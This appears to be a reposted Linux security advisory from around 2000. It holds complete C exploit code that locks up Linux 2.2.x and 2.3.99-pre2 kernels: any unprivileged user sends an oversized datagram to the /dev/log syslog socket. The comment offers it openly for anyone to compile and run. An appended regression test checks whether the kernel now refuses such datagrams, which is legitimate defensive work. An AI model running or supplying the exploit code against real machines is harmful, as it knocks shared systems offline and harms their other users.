The following userspace code locally hangs recent Linux machines. The send system call immediately puts the kernel in a loop spewing "kmalloc: Size (131076) too large". Linux 2.2.14 and 2.3.99-pre2 are vulnerable.
/* [http://b0f.morphed.net] - eth0 */
/* */
/* Vulnerable
Linux 2.2.12
Linux 2.2.13
Linux 2.2.14
Linux 2.3.99-pre2
The following exploit code will hang any Linux machine on various Pentium
platforms.
Note that this does not require any special privileges, and any user can
compile and run it, so watch out kiddies...
The send system call immediately puts the kernel in a loop spewing
kmalloc: Size (131076) too large forever (or until you hit the reset button).
Apparently UNIX domain sockets are ignoring the
/proc/sys/net/core/wmem_max parameter, despite the documentation to the
contrary.
[code provided by eth0 from b0f security]
[information provided by Jay Fenlason]
[http://b0f.morphed.net]
[buffer0verfl0w security]
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <string.h>

char buf[128 * 1024];

int main ( int argc, char **argv )
{
    struct sockaddr SyslogAddr;
    int LogFile;
    int bufsize = sizeof(buf)-5;    /* 131067-byte datagram */
    int i;

    /* Fill the buffer with printable ASCII and terminate it. */
    for ( i = 0; i < bufsize; i++ )
        buf[i] = ' '+(i%95);
    buf[i] = '\0';

    /* Address of the syslog UNIX domain datagram socket. */
    SyslogAddr.sa_family = AF_UNIX;
    strncpy ( SyslogAddr.sa_data, "/dev/log", sizeof(SyslogAddr.sa_data) );

    /* One oversized datagram; the send is what triggers the kmalloc loop. */
    LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 );
    sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, sizeof(SyslogAddr) );
    return 0;
}
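
A regression check for the missing limit described above, added here as an example and not part of the original advisory or of b0f's code. It verifies that the kernel refuses an AF_UNIX datagram larger than the socket's send buffer with EMSGSIZE. The helper name `unix_dgram_limit_enforced`, the 4096-byte buffer request and the use of a private `socketpair` instead of `/dev/log` are assumptions of this example.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper. Returns 1 if an AF_UNIX datagram larger than the
 * socket's send buffer is refused with EMSGSIZE, 0 if the kernel accepted
 * it, -1 if the check could not be carried out. */
int unix_dgram_limit_enforced(int requested_sndbuf, size_t payload_len)
{
    int sv[2], effective = 0, result = -1;
    socklen_t optlen = sizeof(effective);
    char *payload = payload_len >= 64 ? calloc(1, payload_len) : NULL;

    if (payload == NULL)
        return -1;
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sv) != 0) {
        free(payload);
        return -1;
    }
    /* Cap the send buffer and read back the value the kernel applied
     * (Linux doubles the request and clamps it to wmem_max). The 64-byte
     * send is a control: a datagram within the limit must go through. */
    if (setsockopt(sv[0], SOL_SOCKET, SO_SNDBUF, &requested_sndbuf,
                   sizeof(requested_sndbuf)) == 0 &&
        getsockopt(sv[0], SOL_SOCKET, SO_SNDBUF, &effective, &optlen) == 0 &&
        (size_t)effective < payload_len &&
        send(sv[0], payload, 64, MSG_DONTWAIT) == 64) {
        ssize_t n = send(sv[0], payload, payload_len, MSG_DONTWAIT);
        if (n < 0 && errno == EMSGSIZE)
            result = 1;              /* limit enforced */
        else if (n >= 0)
            result = 0;              /* oversized datagram was queued */
    }
    close(sv[0]);
    close(sv[1]);
    free(payload);
    return result;
}

int main(void)
{
    /* 128 * 1024 - 5 is the datagram size used by the code above. */
    int r = unix_dgram_limit_enforced(4096, 128 * 1024 - 5);
    printf("send-buffer limit on AF_UNIX datagrams: %s\n",
           r == 1 ? "enforced" : r == 0 ? "NOT enforced" : "inconclusive");
    return r == 1 ? 0 : 1;
}
```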